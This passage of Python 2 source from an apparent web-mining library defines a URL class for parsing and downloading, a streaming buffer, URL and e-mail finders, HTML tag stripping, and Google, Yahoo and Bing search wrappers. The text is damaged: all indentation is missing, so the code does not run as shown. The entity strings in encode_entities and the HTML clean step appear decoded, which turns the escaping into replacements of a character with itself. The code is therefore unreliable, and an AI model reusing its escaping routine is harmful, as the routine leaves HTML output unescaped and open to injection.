self.__dict__["method"] = method # Use __dict__ directly since __setattr__ is overridden.
self.__dict__["_string"] = u(string)
self.__dict__["_parts"] = None
self.__dict__["_headers"] = None
self.__dict__["_redirect"] = None
if isinstance(string, URL):
self.__dict__["method"] = string.method
self.query.update(string.query)
if len(query) > 0:
# Requires that we parse the string first (see URL.__setattr__).
self.query.update(query)
def _parse(self):
""" Parses all the parts of the URL string to a dictionary.
URL format: protocol://username:password@domain:port/path/page?querystring#anchor
For example: http://user:pass@example.com:992/animal/bird?species=seagull&q#wings
This is a cached method that is only invoked when necessary, and only once.
"""
p = urlparse.urlsplit(self._string)
P = {PROTOCOL: p[0], # http
USERNAME: u"", # user
PASSWORD: u"", # pass
DOMAIN: p[1], # example.com
PORT: u"", # 992
PATH: p[2], # [animal]
PAGE: u"", # bird
QUERY: urldecode(p[3]), # {"species": "seagull", "q": None}
ANCHOR: p[4] # wings
}
# Split the username and password from the domain.
if "@" in P[DOMAIN]:
P[USERNAME], \
P[PASSWORD] = (p[1].split("@")[0].split(":")+[u""])[:2]
P[DOMAIN] = p[1].split("@")[1]
# Split the port number from the domain.
if ":" in P[DOMAIN]:
P[DOMAIN], \
P[PORT] = P[DOMAIN].split(":")
P[PORT] = int(P[PORT])
# Split the base page from the path.
if "/" in P[PATH]:
P[PAGE] = p[2].split("/")[-1]
P[PATH] = p[2][:len(p[2])-len(P[PAGE])].strip("/").split("/")
P[PATH] = filter(lambda v: v != "", P[PATH])
else:
P[PAGE] = p[2].strip("/")
P[PATH] = []
self.__dict__["_parts"] = P
# URL.string yields unicode(URL) by joining the different parts,
# if the URL parts have been modified.
def _get_string(self): return unicode(self)
def _set_string(self, v):
self.__dict__["_string"] = u(v)
self.__dict__["_parts"] = None
string = property(_get_string, _set_string)
@property
def parts(self):
""" Yields a dictionary with the URL parts.
"""
if not self._parts: self._parse()
return self._parts
@property
def querystring(self):
""" Yields the URL querystring: "www.example.com?page=1" => "page=1"
"""
s = self.parts[QUERY].items()
s = dict((bytestring(k), bytestring(v if v is not None else "")) for k, v in s)
s = urllib.urlencode(s)
return s
def __getattr__(self, k):
if k in self.__dict__ : return self.__dict__[k]
if k in self.parts : return self.__dict__["_parts"][k]
raise AttributeError, "'URL' object has no attribute '%s'" % k
def __setattr__(self, k, v):
if k in self.__dict__ : self.__dict__[k] = u(v); return
if k == "string" : self._set_string(v); return
if k == "query" : self.parts[k] = v; return
if k in self.parts : self.__dict__["_parts"][k] = u(v); return
raise AttributeError, "'URL' object has no attribute '%s'" % k
def open(self, timeout=10, proxy=None, user_agent=USER_AGENT, referrer=REFERRER, authentication=None):
""" Returns a connection to the url from which data can be retrieved with connection.read().
When the timeout amount of seconds is exceeded, raises a URLTimeout.
When an error occurs, raises a URLError (e.g. HTTP404NotFound).
"""
url = self.string
# Use basic urllib.urlopen() instead of urllib2.urlopen() for local files.
if os.path.exists(url):
return urllib.urlopen(url)
# Get the query string as a separate parameter if method=POST.
post = self.method == POST and self.querystring or None
socket.setdefaulttimeout(timeout)
if proxy:
proxy = urllib2.ProxyHandler({proxy[1]: proxy[0]})
proxy = urllib2.build_opener(proxy, urllib2.HTTPHandler)
urllib2.install_opener(proxy)
try:
request = urllib2.Request(bytestring(url), post, {
"User-Agent": user_agent,
"Referer": referrer
})
# Basic authentication is established with authentication=(username, password).
if authentication is not None:
request.add_header("Authorization", "Basic %s" %
base64.encodestring('%s:%s' % authentication))
return urllib2.urlopen(request)
except urllib2.HTTPError, e:
if e.code == 301: raise HTTP301Redirect
if e.code == 400: raise HTTP400BadRequest
if e.code == 401: raise HTTP401Authentication
if e.code == 403: raise HTTP403Forbidden
if e.code == 404: raise HTTP404NotFound
if e.code == 420: raise HTTP420Error
if e.code == 500: raise HTTP500InternalServerError
raise HTTPError
except socket.timeout:
raise URLTimeout
except urllib2.URLError, e:
if e.reason == "timed out" \
or e.reason[0] in (36, "timed out"):
raise URLTimeout
raise URLError, e.reason
except ValueError, e:
raise URLError, e
def download(self, timeout=10, cached=True, throttle=0, proxy=None, user_agent=USER_AGENT, referrer=REFERRER, authentication=None, unicode=False, **kwargs):
""" Downloads the content at the given URL (by default it will be cached locally).
With unicode=True, the content is returned as a unicode string; otherwise as a byte string.
"""
# Filter OAuth parameters from cache id (they will be unique for each request).
if self._parts is None and self.method == GET and "oauth_" not in self._string:
id = self._string
else:
id = repr(self.parts)
id = re.sub("u{0,1}'oauth_.*?': u{0,1}'.*?', ", "", id)
# Keep a separate cache of unicode and raw download for same URL.
if unicode is True:
id = "u" + id
if cached and id in cache:
if isinstance(cache, dict): # Not a Cache object.
return cache[id]
if unicode is True:
return cache[id]
if unicode is False:
return cache.get(id, unicode=False)
t = time.time()
# Open a connection with the given settings, read it and (by default) cache the data.
data = self.open(timeout, proxy, user_agent, referrer, authentication).read()
if unicode is True:
data = u(data)
if cached:
cache[id] = data
if throttle:
time.sleep(max(throttle-(time.time()-t), 0))
return data
def read(self, *args):
return self.open().read(*args)
@property
def exists(self, timeout=10):
""" Yields False if the URL generates a HTTP404NotFound error.
"""
try: self.open(timeout)
except HTTP404NotFound:
return False
except (HTTPError, URLTimeout):
return True
except URLError:
return False
except:
return True
return True
@property
def mimetype(self, timeout=10):
""" Yields the MIME-type of the document at the URL, or None.
MIME is more reliable than simply checking the document extension.
You can then do: URL.mimetype in MIMETYPE_IMAGE.
"""
try:
return self.headers["content-type"].split(";")[0]
except KeyError:
return None
@property
def headers(self, timeout=10):
""" Yields a dictionary with the HTTP response headers.
"""
if self.__dict__["_headers"] is None:
try:
h = dict(self.open(timeout).info())
except URLError:
h = {}
self.__dict__["_headers"] = h
return self.__dict__["_headers"]
@property
def redirect(self, timeout=10):
""" Yields the redirected URL, or None.
"""
if self.__dict__["_redirect"] is None:
try:
r = self.open(timeout).geturl()
except URLError:
r = None
self.__dict__["_redirect"] = r != self.string and r or ""
return self.__dict__["_redirect"] or None
def __str__(self):
return bytestring(self.string)
def __unicode__(self):
# The string representation includes the query attributes with HTTP GET.
# This gives us the advantage of not having to parse the URL
# when no separate query attributes were given (e.g. all info is in URL._string):
if self._parts is None and self.method == GET:
return self._string
P = self._parts
u = []
if P[PROTOCOL]:
u.append("%s://" % P[PROTOCOL])
if P[USERNAME]:
u.append("%s:%s@" % (P[USERNAME], P[PASSWORD]))
if P[DOMAIN]:
u.append(P[DOMAIN])
if P[PORT]:
u.append(":%s" % P[PORT])
if P[PATH]:
u.append("/%s/" % "/".join(P[PATH]))
if P[PAGE] and len(u) > 0:
u[-1] = u[-1].rstrip("/")
if P[PAGE]:
u.append("/%s" % P[PAGE])
if P[QUERY] and self.method == GET:
u.append("?%s" % self.querystring)
if P[ANCHOR]:
u.append("#%s" % P[ANCHOR])
u = u"".join(u)
u = u.lstrip("/")
return u
def __repr__(self):
return "URL('%s', method='%s')" % (str(self), str(self.method))
def copy(self):
return URL(self.string, self.method, self.query)
def download(url=u"", method=GET, query={}, timeout=10, cached=True, throttle=0, proxy=None, user_agent=USER_AGENT, referrer=REFERRER, authentication=None, unicode=False):
""" Downloads the content at the given URL (by default it will be cached locally).
With unicode=True, the content is returned as a unicode string; otherwise as a byte string.
"""
return URL(url, method, query).download(timeout, cached, throttle, proxy, user_agent, referrer, authentication, unicode)
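# For example (illustrative; requires an internet connection):
#html = download("http://www.clips.ua.ac.be", unicode=True)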
#url = URL("http://user:pass@example.com:992/animal/bird?species#wings")
#print url.parts
#print url.query
#print url.string
#--- STREAMING URL BUFFER --------------------------------------------------------------------------
def bind(object, method, function):
""" Attaches the function as a method with the given name to the given object.
"""
setattr(object, method, new.instancemethod(function, object))
class Stream(list):
def __init__(self, url, delimiter="\n", **kwargs):
""" Buffered stream of data from a given URL.
"""
self.socket = URL(url).open(**kwargs)
self.buffer = ""
self.delimiter = delimiter
def update(self, bytes=1024):
""" Reads a number of bytes from the stream.
If a delimiter is encountered, calls Stream.parse() on the packet.
"""
packets = []
self.buffer += self.socket.read(bytes)
self.buffer = self.buffer.split(self.delimiter, 1)
while len(self.buffer) > 1:
data = self.buffer[0]
data = self.parse(data)
packets.append(data)
self.buffer = self.buffer[-1]
self.buffer = self.buffer.split(self.delimiter, 1)
self.buffer = self.buffer[-1]
self.extend(packets)
return packets
def parse(self, data):
""" Must be overridden in a subclass.
"""
return data
def clear(self):
list.__init__(self, [])
def stream(url, delimiter="\n", parse=lambda data: data, **kwargs):
""" Returns a new Stream with the given parse method.
"""
stream = Stream(url, delimiter, **kwargs)
bind(stream, "parse", lambda stream, data: parse(data))
return stream
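# A minimal sketch of a custom stream (the URL and parser are illustrative):
#s = stream("http://example.com/feed", delimiter="\n", parse=lambda data: data.strip())
#s.update() # Reads the next packets; parsed packets accumulate in the Stream (a list).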
#--- FIND URLs -------------------------------------------------------------------------------------
RE_URL_PUNCTUATION = ("\"'{(>", "\"'.,;)}")
RE_URL_HEAD = r"[%s|\[|\s]" % "|".join(RE_URL_PUNCTUATION[0]) # Preceded by space, parenthesis or HTML tag.
RE_URL_TAIL = r"[%s|\]]*[\s|\<]" % "|".join(RE_URL_PUNCTUATION[1]) # Followed by space, punctuation or HTML tag.
RE_URL1 = r"(https?://.*?)" + RE_URL_TAIL # Starts with http:// or https://
RE_URL2 = RE_URL_HEAD + r"(www\..*?\..*?)" + RE_URL_TAIL # Starts with www.
RE_URL3 = RE_URL_HEAD + r"([\w|-]*?\.(com|net|org))" + RE_URL_TAIL # Ends with .com, .net, .org
RE_URL1, RE_URL2, RE_URL3 = (
re.compile(RE_URL1, re.I),
re.compile(RE_URL2, re.I),
re.compile(RE_URL3, re.I))
def find_urls(string, unique=True):
""" Returns a list of URLs parsed from the string.
Works on http://, https://, www. links or domain names ending in .com, .org, .net.
Links can be preceded by leading punctuation (open parens)
and followed by trailing punctuation (period, comma, close parens).
"""
string = u(string)
string = string.replace(u"\u2024", ".")
string = string.replace(" ", " ")
matches = []
for p in (RE_URL1, RE_URL2, RE_URL3):
for m in p.finditer(" %s " % string):
s = m.group(1)
s = s.split("\">")[0].split("'>")[0] # google.com">Google => google.com
if not unique or s not in matches:
matches.append(s)
return matches
links = find_urls
RE_EMAIL = re.compile(r"[\w\-\.\+]+@(\w[\w\-]+\.)+[\w\-]+") # tom.de+smedt@clips.ua.ac.be
def find_email(string, unique=True):
""" Returns a list of e-mail addresses parsed from the string.
"""
string = u(string).replace(u"\u2024", ".")
matches = []
for m in RE_EMAIL.finditer(string):
s = m.group(0)
if not unique or s not in matches:
matches.append(s)
return matches
def find_between(a, b, string):
""" Returns a list of substrings between a and b in the given string.
"""
p = "%s(.*?)%s" % (a, b)
p = re.compile(p, re.DOTALL | re.I)
return [m for m in p.findall(string)]
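# For example (illustrative):
#print find_urls("Visit http://www.clips.ua.ac.be for more info.") # => ["http://www.clips.ua.ac.be"]
#print find_email("Contact tom.de+smedt@clips.ua.ac.be.")          # => ["tom.de+smedt@clips.ua.ac.be"]
#print find_between("<b>", "</b>", "<b>1</b><b>2</b>")             # => ["1", "2"]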
#### PLAIN TEXT ####################################################################################
BLOCK = [
"title", "h1", "h2", "h3", "h4", "h5", "h6", "p",
"center", "blockquote", "div", "table", "ul", "ol", "pre", "code", "form"
]
SELF_CLOSING = ["br", "hr", "img"]
# Element tag replacements for a stripped version of HTML source with strip_tags().
# Block-level elements are followed by linebreaks,
# list items are preceded by an asterisk ("*").
LIST_ITEM = "*"
blocks = dict.fromkeys(BLOCK+["br", "tr", "td"], ("", "\n\n"))
blocks.update({
"li": ("%s " % LIST_ITEM, "\n"),
"img": ("", ""),
"br": ("", "\n"),
"th": ("", "\n"),
"tr": ("", "\n"),
"td": ("", "\t"),
})
class HTMLParser(sgmllib.SGMLParser):
def __init__(self):
sgmllib.SGMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
pass
def handle_endtag(self, tag):
pass
def unknown_starttag(self, tag, attrs):
self.handle_starttag(tag, attrs)
def unknown_endtag(self, tag):
self.handle_endtag(tag)
def clean(self, html):
html = decode_utf8(html)
html = html.replace("/>", " />")
html = html.replace(" />", " />")
html = html.replace("<!", "<!")
html = html.replace("<!DOCTYPE", "<!DOCTYPE")
html = html.replace("<!doctype", "<!doctype")
html = html.replace("<!--", "<!--")
return html
def parse_declaration(self, i):
# We can live without sgmllib's parse_declaration().
try:
return sgmllib.SGMLParser.parse_declaration(self, i)
except sgmllib.SGMLParseError:
return i + 1
def convert_charref(self, name):
# This fixes a bug in older versions of sgmllib when working with Unicode.
# Fix: ASCII ends at 127, not 255
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 127:
return
return chr(n)
class HTMLTagstripper(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
def strip(self, html, exclude=[], replace=blocks):
""" Returns the HTML string with all element tags (e.g. <p>) removed.
- exclude : a list of tags to keep. Element attributes are stripped.
To preserve attributes a dict of (tag name, [attribute])-items can be given.
- replace : a dictionary of (tag name, (replace_before, replace_after))-items.
By default, block-level elements are separated with linebreaks.
"""
if html is None:
return None
self._exclude = isinstance(exclude, dict) and exclude or dict.fromkeys(exclude, [])
self._replace = replace
self._data = []
self.feed(self.clean(html))
self.close()
self.reset()
return "".join(self._data)
def clean(self, html):
# Escape all entities (just strip tags).
return HTMLParser.clean(self, html).replace("&", "&amp;")
def handle_starttag(self, tag, attributes):
if tag in self._exclude:
# Create the tag attribute string,
# including attributes defined in the HTMLTagStripper._exclude dict.
a = len(self._exclude[tag]) > 0 and attributes or []
a = ["%s=\"%s\"" % (k,v) for k, v in a if k in self._exclude[tag]]
a = (" "+" ".join(a)).rstrip()
self._data.append("<%s%s>" % (tag, a))
if tag in self._replace:
self._data.append(self._replace[tag][0])
if tag in self._replace and tag in SELF_CLOSING:
self._data.append(self._replace[tag][1])
def handle_endtag(self, tag):
if tag in self._exclude and self._data and self._data[-1].startswith("<"+tag):
# Never keep empty elements (e.g. <a></a>).
self._data.pop(-1); return
if tag in self._exclude:
self._data.append("</%s>" % tag)
if tag in self._replace:
self._data.append(self._replace[tag][1])
def handle_data(self, data):
self._data.append(data.strip("\n\t"))
def handle_comment(self, comment):
if "comment" in self._exclude or \
"!--" in self._exclude:
self._data.append("<!--%s-->" % comment)
# As a function:
strip_tags = HTMLTagstripper().strip
def strip_element(string, tag, attributes=""):
""" Removes all elements with the given tagname and attributes from the string.
Open and close tags are kept in balance.
No HTML parser is used: strip_element(s, "a", "href='foo' class='bar'")
matches "<a href='foo' class='bar'" but not "<a class='bar' href='foo'".
"""
s = string.lower() # Case-insensitive.
t = tag.strip("</>")
a = (" " + attributes.lower().strip()).rstrip()
i = 0
j = 0
while j >= 0:
i = s.find("<%s%s" % (t, a), i)
j = s.find("</%s>" % t, i+1)
opened, closed = s[i:j].count("<%s" % t), 1
while opened > closed and j >= 0:
k = s.find("</%s>" % t, j+1)
opened += s[j:k].count("<%s" % t)
closed += 1
j = k
if i < 0: return string
if j < 0: return string[:i]
string = string[:i] + string[j+len(t)+3:]; s=string.lower()
return string
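# For example (illustrative):
#print strip_element(u"a <div class='x'>b <div>c</div></div> d", "div", "class='x'") # => "a  d"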
def strip_between(a, b, string):
""" Removes anything between (and including) string a and b inside the given string.
"""
p = "%s.*?%s" % (a, b)
p = re.compile(p, re.DOTALL | re.I)
return re.sub(p, "", string)
def strip_javascript(html):
return strip_between("<script.*?>", "</script>", html)
def strip_inline_css(html):
return strip_between("<style.*?>", "</style>", html)
def strip_comments(html):
return strip_between("<!--", "-->", html)
def strip_forms(html):
return strip_between("<form.*?>", "</form>", html)
RE_AMPERSAND = re.compile("\&(?!\#)") # & not followed by #
RE_UNICODE = re.compile(r'&(#?)(x|X?)(\w+);') # e.g., &#201;
def encode_entities(string):
""" Encodes HTML entities in the given string ("<" => "<").
For example, to display "<em>hello</em>" in a browser,
we need to pass "<em>hello</em>" (otherwise "hello" in italic is displayed).
"""
if isinstance(string, (str, unicode)):
string = RE_AMPERSAND.sub("&", string)
string = string.replace("<", "<")
string = string.replace(">", ">")
string = string.replace('"', """)
string = string.replace("'", "'")
return string
def decode_entities(string):
""" Decodes HTML entities in the given string ("<" => "<").
"""
# http://snippets.dzone.com/posts/show/4569
def replace_entity(match):
hash, hex, name = match.group(1), match.group(2), match.group(3)
if hash == "#" or name.isdigit():
if hex == '' :
return unichr(int(name)) # "&#38;" => "&"
if hex in ("x","X"):
return unichr(int('0x'+name, 16)) # "&#x26;" => "&"
else:
cp = htmlentitydefs.name2codepoint.get(name) # "&amp;" => "&"
return cp and unichr(cp) or match.group() # "&foo;" => "&foo;"
if isinstance(string, (str, unicode)):
return RE_UNICODE.subn(replace_entity, string)[0]
return string
def encode_url(string):
return urllib.quote_plus(bytestring(string))
def decode_url(string):
return urllib.unquote_plus(string) # "black/white" => "black%2Fwhite".
RE_SPACES = re.compile("( |\xa0)+", re.M) # Matches one or more spaces.
RE_TABS = re.compile(r"\t+", re.M) # Matches one or more tabs.
def collapse_spaces(string, indentation=False, replace=" "):
""" Returns a string with consecutive spaces collapsed to a single space.
Whitespace on empty lines and at the end of each line is removed.
With indentation=True, retains leading whitespace on each line.
"""
p = []
for x in string.splitlines():
n = indentation and len(x) - len(x.lstrip()) or 0
p.append(x[:n] + RE_SPACES.sub(replace, x[n:]).strip())
return "\n".join(p)
def collapse_tabs(string, indentation=False, replace=" "):
""" Returns a string with (consecutive) tabs replaced by a single space.
Whitespace on empty lines and at the end of each line is removed.
With indentation=True, retains leading whitespace on each line.
"""
p = []
for x in string.splitlines():
n = indentation and len(x) - len(x.lstrip()) or 0
p.append(x[:n] + RE_TABS.sub(replace, x[n:]).strip())
return "\n".join(p)
def collapse_linebreaks(string, threshold=1):
""" Returns a string with consecutive linebreaks collapsed to at most the given threshold.
Whitespace on empty lines and at the end of each line is removed.
"""
n = "\n" * threshold
p = [s.rstrip() for s in string.splitlines()]
string = "\n".join(p)
string = re.sub(n+r"+", n, string)
return string
def plaintext(html, keep=[], replace=blocks, linebreaks=2, indentation=False):
""" Returns a string with all HTML tags removed.
Content inside HTML comments, the <style> tag and the <script> tags is removed.
- keep : a list of tags to keep. Element attributes are stripped.
To preserve attributes a dict of (tag name, [attribute])-items can be given.
- replace : a dictionary of (tag name, (replace_before, replace_after))-items.
By default, block-level elements are followed by linebreaks.
- linebreaks : the maximum amount of consecutive linebreaks,
- indentation : keep left line indentation (tabs and spaces)?
"""
if not keep.__contains__("script"):
html = strip_javascript(html)
if not keep.__contains__("style"):
html = strip_inline_css(html)
if not keep.__contains__("form"):
html = strip_forms(html)
if not keep.__contains__("comment") and \
not keep.__contains__("!--"):
html = strip_comments(html)
html = html.replace("\r", "\n")
html = strip_tags(html, exclude=keep, replace=replace)
html = decode_entities(html)
html = collapse_spaces(html, indentation)
html = collapse_tabs(html, indentation)
html = collapse_linebreaks(html, linebreaks)
html = html.strip()
return html
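# For example (illustrative):
#print plaintext("<p>Hello <b>world</b>!</p>", keep=["b"]) # => "Hello <b>world</b>!"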
#### SEARCH ENGINE #################################################################################
SEARCH = "search" # Query for pages (i.e. links to websites).
IMAGE = "image" # Query for images.
NEWS = "news" # Query for news items.
TINY = "tiny" # Image size around 100x100.
SMALL = "small" # Image size around 200x200.
MEDIUM = "medium" # Image size around 500x500.
LARGE = "large" # Image size around 1000x1000.
RELEVANCY = "relevancy" # Sort results by most relevant.
LATEST = "latest" # Sort results by most recent.
class Result(dict):
def __init__(self, url):
""" An item in a list of results returned by SearchEngine.search().
All dictionary entries are available as unicode string attributes.
- url : the URL of the referred web content,
- title : the title of the content at the URL,
- text : the content text,
- language: the content language,
- author : for news items and images, the author,
- date : for news items, the publication date.
"""
dict.__init__(self)
self.url = url
@property
def description(self):
return self.text # Backwards compatibility.
def download(self, *args, **kwargs):
""" Download the content at the given URL.
By default it will be cached - see URL.download().
"""
return URL(self.url).download(*args, **kwargs)
def __getattr__(self, k):
return self.get(k, u"")
def __getitem__(self, k):
return self.get(k, u"")
def __setattr__(self, k, v):
dict.__setitem__(self, u(k), v is not None and u(v) or u"") # Store strings as unicode.
def __setitem__(self, k, v):
dict.__setitem__(self, u(k), v is not None and u(v) or u"")
def setdefault(self, k, v):
dict.setdefault(self, u(k), u(v))
def update(self, *args, **kwargs):
map = dict()
map.update(*args, **kwargs)
dict.update(self, [(u(k), u(v)) for k, v in map.items()])
def __repr__(self):
return "Result(url=%s)" % repr(self.url)
class Results(list):
def __init__(self, source=None, query=None, type=SEARCH, total=0):
""" A list of results returned from SearchEngine.search().
- source: the service that yields the results (e.g. GOOGLE, TWITTER).
- query : the query that yields the results.
- type : the query type (SEARCH, IMAGE, NEWS).
- total : the total result count.
This is not the length of the list, but the total number of matches for the given query.
"""
self.source = source
self.query = query
self.type = type
self.total = total
class SearchEngine:
def __init__(self, license=None, throttle=1.0, language=None):
""" A base class for a web service.
- license : license key for the API,
- throttle : delay between requests (avoid hammering the server).
Inherited by: Google, Yahoo, Bing, Twitter, Wikipedia, Flickr.
"""
self.license = license
self.throttle = throttle # Amount of sleep time after executing a query.
self.language = language # Result.language restriction (e.g., "en").
self.format = lambda x: x # Formatter applied to each attribute of each Result.
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
return Results(source=None, query=query, type=type)
class SearchEngineError(HTTPError):
pass
class SearchEngineTypeError(SearchEngineError):
pass # Raised when an unknown type is passed to SearchEngine.search().
class SearchEngineLimitError(SearchEngineError):
pass # Raised when the query limit for a license is reached.
#--- GOOGLE ----------------------------------------------------------------------------------------
# Google Custom Search is a paid service.
# https://code.google.com/apis/console/
# http://code.google.com/apis/customsearch/v1/overview.html
GOOGLE = "https://www.googleapis.com/customsearch/v1?"
GOOGLE_LICENSE = api.license["Google"]
GOOGLE_CUSTOM_SEARCH_ENGINE = "000579440470800426354:_4qo2s0ijsi"
# Search results can start with: "Jul 29, 2007 ...",
# which is the date of the page parsed by Google from the content.
RE_GOOGLE_DATE = re.compile("^([A-Z][a-z]{2} [0-9]{1,2}, [0-9]{4}) {0,1}...")
class Google(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or GOOGLE_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Google for the given query.
- type : SEARCH,
- start: maximum 100 results => start 1-10 with count=10,
- count: maximum 10,
There is a daily limit of 10,000 queries. Google Custom Search is a paid service.
"""
if type != SEARCH:
raise SearchEngineTypeError
if not query or count < 1 or start < 1 or start > (100 / count):
return Results(GOOGLE, query, type)
# 1) Create request URL.
url = URL(GOOGLE, query={
"key": self.license or GOOGLE_LICENSE,
"cx": GOOGLE_CUSTOM_SEARCH_ENGINE,
"q": query,
"start": 1 + (start-1) * count,
"num": min(count, 10),
"alt": "json"
})
# 2) Restrict language.
if self.language is not None:
url.query["lr"] = "lang_" + self.language
# 3) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
data = url.download(cached=cached, **kwargs)
data = json.loads(data)
if data.get("error", {}).get("code") == 403:
raise SearchEngineLimitError
results = Results(GOOGLE, query, type)
results.total = int(data.get("queries", {}).get("request", [{}])[0].get("totalResults") or 0)
for x in data.get("items", []):
r = Result(url=None)
r.url = self.format(x.get("link"))
r.title = self.format(x.get("title"))
r.text = self.format(x.get("htmlSnippet").replace("<br> ","").replace("<b>...</b>", "..."))
r.language = self.language or ""
r.date = ""
if not r.date:
# Google Search results can start with a date (parsed from the content):
m = RE_GOOGLE_DATE.match(r.text)
if m:
r.date = m.group(1)
r.text = "..." + r.text[len(m.group(0)):]
results.append(r)
return results
def translate(self, string, input="en", output="fr", **kwargs):
""" Returns the translation of the given string in the desired output language.
Google Translate is a paid service, license without billing raises HTTP401Authentication.
"""
url = URL("https://www.googleapis.com/language/translate/v2?", method=GET, query={
"key": GOOGLE_LICENSE,
"q": string,
"source": input,
"target": output
})
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(**kwargs)
except HTTP403Forbidden:
raise HTTP401Authentication, "Google translate API is a paid service"
data = json.loads(data)
data = data.get("data", {}).get("translations", [{}])[0].get("translatedText", "")
data = decode_entities(data)
return u(data)
def identify(self, string, **kwargs):
""" Returns a (language, confidence)-tuple for the given string.
Google Translate is a paid service, license without billing raises HTTP401Authentication.
"""
url = URL("https://www.googleapis.com/language/translate/v2/detect?", method=GET, query={
"key": GOOGLE_LICENSE,
"q": string[:1000]
})
kwargs.setdefault("cached", False)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(**kwargs)
except HTTP403Forbidden:
raise HTTP401Authentication, "Google translate API is a paid service"
data = json.loads(data)
data = data.get("data", {}).get("detections", [[{}]])[0][0]
data = u(data.get("language")), float(data.get("confidence"))
return data
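# A minimal usage sketch (commented out; requires a valid Google Custom Search license key,
# and the query is illustrative):
#engine = Google(license=None, language="en")
#for result in engine.search("holy grail", cached=False):
#    print result.title
#    print result.url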
#--- YAHOO -----------------------------------------------------------------------------------------
# Yahoo BOSS is a paid service.
# http://developer.yahoo.com/search/
YAHOO = "http://yboss.yahooapis.com/ysearch/"
YAHOO_LICENSE = api.license["Yahoo"]
class Yahoo(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or YAHOO_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
""" Returns a list of results from Yahoo for the given query.
- type : SEARCH, IMAGE or NEWS,
- start: maximum 1000 results => start 1-100 with count=10, 1000/count,
- count: maximum 50, or 35 for images.
There is no daily limit, however Yahoo BOSS is a paid service.
"""
if type not in (SEARCH, IMAGE, NEWS):
raise SearchEngineTypeError
if type == SEARCH:
url = YAHOO + "web"
if type == IMAGE:
url = YAHOO + "images"
if type == NEWS:
url = YAHOO + "news"
if not query or count < 1 or start < 1 or start > 1000 / count:
return Results(YAHOO, query, type)
# 1) Create request URL.
url = URL(url, method=GET, query={
"q": encode_url(query),
"start": 1 + (start-1) * count,
"count": min(count, type==IMAGE and 35 or 50),
"format": "json"
})
# 2) Restrict language.
if self.language is not None:
market = locale.market(self.language)
if market:
url.query["market"] = market.lower()
# 3) BOSS OAuth authentication.
url.query.update({
"oauth_version": "1.0",
"oauth_nonce": oauth.nonce(),
"oauth_timestamp": oauth.timestamp(),
"oauth_consumer_key": self.license[0],
"oauth_signature_method": "HMAC-SHA1"
})
url.query["oauth_signature"] = oauth.sign(url.string.split("?")[0], url.query, method=GET, secret=self.license[1])
# 3) Parse JSON response.
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(cached=cached, **kwargs)
except HTTP401Authentication:
raise HTTP401Authentication, "Yahoo %s API is a paid service" % type
except HTTP403Forbidden:
raise SearchEngineLimitError
data = json.loads(data)
data = data.get("bossresponse") or {}
data = data.get({SEARCH:"web", IMAGE:"images", NEWS:"news"}[type], {})
results = Results(YAHOO, query, type)
results.total = int(data.get("totalresults") or 0)
for x in data.get("results", []):
r = Result(url=None)
r.url = self.format(x.get("url", x.get("clickurl")))
r.title = self.format(x.get("title"))
r.text = self.format(x.get("abstract"))
r.date = self.format(x.get("date"))
r.author = self.format(x.get("source"))
r.language = self.format(x.get("language") and \
x.get("language").split(" ")[0] or self.language or "")
results.append(r)
return results
#--- BING ------------------------------------------------------------------------------------------
# https://datamarket.azure.com/dataset/5BA839F1-12CE-4CCE-BF57-A49D98D29A44
# https://datamarket.azure.com/account/info
BING = "https://api.datamarket.azure.com/Bing/Search/"
BING_LICENSE = api.license["Bing"]
class Bing(SearchEngine):
def __init__(self, license=None, throttle=0.5, language=None):
SearchEngine.__init__(self, license or BING_LICENSE, throttle, language)
def search(self, query, type=SEARCH, start=1, count=10, sort=RELEVANCY, size=None, cached=True, **kwargs):
"""" Returns a list of results from Bing for the given query.
- type : SEARCH, IMAGE or NEWS,
- start: maximum 1000 results => start 1-100 with count=10, 1000/count,
- count: maximum 50, or 15 for news,
- size : for images, either SMALL, MEDIUM or LARGE.
There is no daily query limit.
"""
if type not in (SEARCH, IMAGE, NEWS):
raise SearchEngineTypeError
if type == SEARCH:
src = "Web"
if type == IMAGE:
src = "Image"
if type == NEWS:
src = "News"
if not query or count < 1 or start < 1 or start > 1000 / count:
return Results(BING + src + "?", query, type)
# 1) Construct request URL.
url = URL(BING + "Composite", method=GET, query={
"Sources": "'" + src.lower() + "'",
"Query": "'" + query + "'",
"$skip": 1 + (start-1) * count,
"$top": min(count, type==NEWS and 15 or 50),
"$format": "json",
})
# 2) Restrict image size.
if size in (TINY, SMALL, MEDIUM, LARGE):
url.query["ImageFilters"] = {
TINY: "'Size:Small'",
SMALL: "'Size:Small'",
MEDIUM: "'Size:Medium'",
LARGE: "'Size:Large'" }[size]
# 3) Restrict language.
if type in (SEARCH, IMAGE) and self.language is not None:
url.query["Query"] = url.query["Query"][:-1] + " language: %s'" % self.language
#if self.language is not None:
# market = locale.market(self.language)
# if market:
# url.query["market"] = market
# 4) Parse JSON response.
kwargs["authentication"] = ("", self.license)
kwargs.setdefault("unicode", True)
kwargs.setdefault("throttle", self.throttle)
try:
data = url.download(cached=cached, **kwargs)
except HTTP401Authentication:
raise HTTP401Authentication, "Bing %s API is a paid service" % type
data = json.loads(data)
data = data.get("d", {})
data = data.get("results", [{}])[0]
results = Results(BING, query, type)
results.total = int(data.get(src+"Total", 0))
for x in data.get(src, []):
r = Result(url=None)
r.url = self.format(x.get("MediaUrl", x.get("Url")))
r.title = self.format(x.get("Title"))
r.text = self.format(x.get("Description", x.get("Snippet")))
r.language = self.language or ""
r.date = self.format(x.get("DateTime", x.get("Date")))
r.author = self.format(x.get("Source"))
results.append(r)
